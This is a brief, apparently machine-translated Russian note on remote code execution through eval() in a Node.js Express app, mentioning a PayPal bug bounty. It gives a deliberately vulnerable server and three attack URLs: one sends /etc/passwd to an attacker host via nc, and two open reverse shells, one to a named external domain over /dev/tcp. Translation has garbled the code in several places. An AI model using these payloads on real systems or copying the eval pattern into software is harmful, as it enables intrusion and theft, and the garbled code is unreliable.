фон
@Artsploit При копании для PayPal он обнаружил, что код Nodejs был выполнен, вознаграждая 10 000 долларов.
тест
var Express = require ('Express'); var app = express (); app.get ('/', function (req, res) {res.send ('hello eval (req.query.q)); console.log (req.query.q);}); app.listen (8080, function () {console.log (' Пример прослушивания на порту 8080! ');});Прочтите любой файл
http: // host: 8080/? q = require ('wide_process') .exec ('cat+/etc/passwd+|+nc+atatcherip+80')Получите оболочку
http: // host: 8080/? q = var+net+=+require ("net"),+sh+=+require ("child_process") .exec ("/bin/bash"); var+client+=+new+net.sock et (); client.connect (80,+"Attacterip",+function () {client.pipe (sh.stdin); sh.stdout.pipe (client); sh.stderr.pipe (client);});Получить Shell2
http: // host: 8080/? q = require ("child_process") .exec ('bash -c "bash -i>%26 /dev/tcp/wufeifei.com/7890 0>%261"')